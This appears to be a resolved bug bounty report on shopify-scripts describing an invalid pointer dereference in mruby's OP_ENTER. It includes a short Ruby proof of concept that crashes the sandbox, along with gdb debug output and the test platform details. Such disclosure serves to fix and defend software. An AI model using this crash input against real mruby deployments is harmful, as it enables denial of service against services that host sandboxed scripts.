Invalid pointer dereference in OP_ENTER
Low
shopify-scripts
Reported by: dgaletic
Vulnerability Details
Technical details and impact analysis
PoC
===
The following demonstrates a mruby/sandbox crash:
def method_missing
end
__send__ :f,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
Debug info
==========
The crash happens due to an invalid pointer dereference in vm.c:1573:

```
1571│     if (argc < 0) {
1572│       struct RArray *ary = mrb_ary_ptr(regs[1]);
1573├>      argv = ary->ptr;
(gdb) p ary->ptr
Cannot access memory at address 0x4000002cb
```
Test platform
=============
* Linux Mint 17.3 (Cinnamon 64-bit), built with gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3)
* mruby SHA: bdeb803f04b6bd919202b078a52df7abb0af73ee
* mruby-engine SHA: 09be20e67888b20bebf9b0588bc3cbec7f55325f
Thank you,
Dinko Galetic
Denis Kasak
Report Details
Additional information and metadata
* State: Closed
* Substate: Resolved
* Bounty: $800.00
* Weakness: Uncontrolled Resource Consumption